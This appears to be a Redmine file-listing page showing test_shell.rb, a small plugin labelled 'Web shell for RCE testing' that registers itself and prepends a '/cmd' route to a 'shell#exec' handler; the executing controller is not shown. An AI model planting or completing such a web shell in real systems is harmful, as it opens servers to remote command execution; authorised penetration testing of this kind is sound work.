Project

General

Profile

Files » test_shell.rb

shell - Redmine Admin, 07/16/2026 09:52 AM

 
require 'redmine'
Redmine::Plugin.register :shell do
name 'Shell Plugin'
author 'Pentest'
description 'Web shell for RCE testing'
version '0.0.1'
end
Rails.application.routes.prepend do
match '/cmd', :to => 'shell#exec', :via => [:get, :post]
end
(8-8/15)